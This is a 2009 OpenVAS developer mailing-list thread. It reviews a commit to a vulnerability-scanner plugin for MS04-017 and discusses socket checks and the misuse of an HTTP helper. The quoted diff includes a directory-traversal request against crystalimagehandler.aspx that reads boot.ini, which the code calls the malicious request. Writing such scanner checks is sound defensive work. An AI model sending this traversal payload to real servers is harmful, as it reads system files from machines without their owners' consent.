[Openvas-devel] [Openvas-commits] r4805 -trunk/openvas-plugins/scripts
Chandrashekhar B
bchandra at secpod.com
Wed Sep 2 07:38:29 CEST 2009
Hello Christian,
I have added socket functions inside if(soc) which resolves the dump errors.
Before calling the functions such as send(), close(), there should always be
a check soc either,
If(soc) or if(!soc) exit(0)
Also there are few more problems in the plugin,
In ln 114, you are constructing a complete HTTP GET request and then calling
http_get() function, http_get itself will do all these, just need to pass
the URL. In this case http_get() is returning a wrong HTTP request.
Thanks,
Chandra.
-----Original Message-----
From: openvas-devel-bounces at wald.intevation.org
[mailto:openvas-devel-bounces at wald.intevation.org] On Behalf Of Christian
Eric Edjenguele
Sent: Tuesday, September 01, 2009 9:52 PM
To: openvas-devel at wald.intevation.org
Subject: Re: [Openvas-devel] [Openvas-commits] r4805
-trunk/openvas-plugins/scripts
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi Chandra, I'm not certain about changes in this code, Jan told me
about some errors, but does identation solves the problem ?
thanks.
scm-commit at wald.intevation.org wrote:
> Author: chandra
> Date: 2009-09-01 12:58:12 +0200 (Tue, 01 Sep 2009)
> New Revision: 4805
>
> Modified:
> trunk/openvas-plugins/scripts/remote-MS04-017.nasl
> Log:
> Updated to resolve the issue in dump messages
>
> Modified: trunk/openvas-plugins/scripts/remote-MS04-017.nasl
> ===================================================================
> --- trunk/openvas-plugins/scripts/remote-MS04-017.nasl 2009-09-01
09:22:54 UTC (rev 4804)
> +++ trunk/openvas-plugins/scripts/remote-MS04-017.nasl 2009-09-01
10:58:12 UTC (rev 4805)
> @@ -108,19 +108,22 @@
> foreach page (pages)
> {
> soc = open_sock_tcp(port);
> - # build the malicious request
> - request = page +
'/crystalimagehandler.aspx?dynamicimage=../../../../../../../../../boot.ini'
;
> + if(soc)
> + {
> + # build the malicious request
> + request = page +
'/crystalimagehandler.aspx?dynamicimage=../../../../../../../../../boot.ini'
;
>
> - qry = string('GET ' + request + ' HTTP/1.0\r\n',
> - 'Host: ' + h_ip + ':' + port + '\r\n\r\n');
> + qry = string('GET ' + request + ' HTTP/1.0\r\n',
> + 'Host: ' + h_ip + ':' + port + '\r\n\r\n');
>
> - req = http_get(item:qry, port:port);
> - send(socket:soc, data: req);
> + req = http_get(item:qry, port:port);
> + send(socket:soc, data: req);
>
> - # Get back the response
> - reply = recv(socket:soc, length:4096);
> + # Get back the response
> + reply = recv(socket:soc, length:4096);
>
> - close(soc);
> + close(soc);
> + }
>
> if(reply)
> {
>
> _______________________________________________
> Openvas-commits mailing list
> Openvas-commits at wald.intevation.org
> http://lists.wald.intevation.org/mailman/listinfo/openvas-commits
- --
Christian Eric Edjenguele
IT Security Engineer
PGP KeyID: 0xB1654498
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQEcBAEBAgAGBQJKnUoMAAoJENETScWxZUSYfFgH/jgW7VwvG8fPAcfbI1P8IXwB
XwgrzX2rha7Qqqrceswpkyh+qVwt9X4RTeKQRVlLnKCZBT7pqEXWdAvlYsNdQcEP
wkMYLl/D5BLWyDNAJ/FaEfyq9PXgz/jjg7l0Y8MSy5hF9J5zoL5IQSwIO2RTDqYx
rjVgYHX3h+Vkr08Y6V7hbpVrVQfnvJmaMWx+kis6SUyAdJti6C6Nz4SCRcwn1j7l
yQFQZCU4GfMCYGVwwbuPZZh2n4GVgLEQ4p4kkFCe+K364t+wVSNem5WrFsD68MCS
WEcYt0eq78pCN9TqYNyDU+X4I1lggJQbVRHmE6U+Dh/L0wEu1dUoM3D701C56h4=
=xhPQ
-----END PGP SIGNATURE-----
_______________________________________________
Openvas-devel mailing list
Openvas-devel at wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-devel
More information about the Openvas-devel
mailing list